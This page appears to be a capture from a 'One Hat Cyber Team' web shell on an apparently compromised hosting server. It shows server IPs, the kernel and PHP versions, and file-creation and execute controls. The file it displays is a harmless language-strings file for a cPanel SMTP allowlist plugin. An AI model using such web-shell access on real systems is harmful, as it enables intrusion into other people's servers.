One Hat Cyber Team
Your IP :
216.73.217.131
Server IP :
185.33.55.30
Server :
Linux cl30.webspacecontrol.com 5.14.0-611.38.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 10 17:21:28 EDT 2026 x86_64
Server Software :
Apache
PHP Version :
8.1.34
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
opt
/
whlist
/
cpanel
/
whlist
/
lang
/
View File Name :
en.php
<?php ////////////////////////////////////////////////////////////// //=========================================================== // en.php (English) Email SMTP Allowlist //=========================================================== // Version : 2.0 // Generator : Istvanovszki Zoltan // URL : https://www.dotroll.com //=========================================================== // (c) DotRoll Kft.. https://www.dotroll.com //=========================================================== ////////////////////////////////////////////////////////////// $LANG = array(); $LANG['whlist'] = 'Incoming e-mail whitelist (PTR):'; $LANG['whlistIP'] = 'In this section, you can manage the incoming e-mail sender’s Ip addresses. Incoming e-mails from the listed IP addresses or Ip ranges goes to your inbox without PTR inspection. (for example: 80.77.12.15 or 80.77.120.0/24)'; $LANG['whlistEmail'] = 'In this section you can the incoming e-mail sender’s e-mail addresses. Incoming e-mails from the listed e-mail addresses goes to your inbox without PTR inspection. (for example: test@yourdomain.com or *@yourdomain.com)'; $LANG['invalidIP'] = 'Invalid IP address'; $LANG['IPaddress'] = 'IP address'; $LANG['actions'] = 'Actions'; $LANG['delete'] = 'Delete'; $LANG['add'] = 'Add'; $LANG['emailAddress'] = 'E-mail address'; $LANG['emailAddressDesc'] = 'i.e. *part@domain.tld or user@domain.tld'; $LANG['invalidEmail'] = 'Invalid E-mail address'; $LANG['smtpauth'] = 'Outgoing e-mail whitelist:'; $LANG['smtpauthCountry'] = 'In this section you can manage the countries what you can use for outgoing e-mails. Only, from the listed countries can possible sends e-mails on behalf of your domains via SMTP server. If you do not have listed country, you can send e-mails only from Hungary as a default country.'; $LANG['smtpauthCidr'] = 'In this section you can manage the IP addresses and ranges what you can use for outgoing e-mails. The system permit to send outgoing e-mails from the listed IP adresses. (with this option you can override the country settings, for example: 80.77.12.15 or 80.77.120.0/24)'; $LANG['smtpauthCountryName'] = 'Country'; $LANG['cidr'] = 'IP range (Cidr: IP / mask)'; $LANG['cidrDesc'] = 'ip address /mask 10.10.10.10./24 - CIDR'; // Errors $LANG['cptokens'] = 'cPanel Security Token must be enable in order to work with the Webspacecontrol SMTP Allowlist plugin.';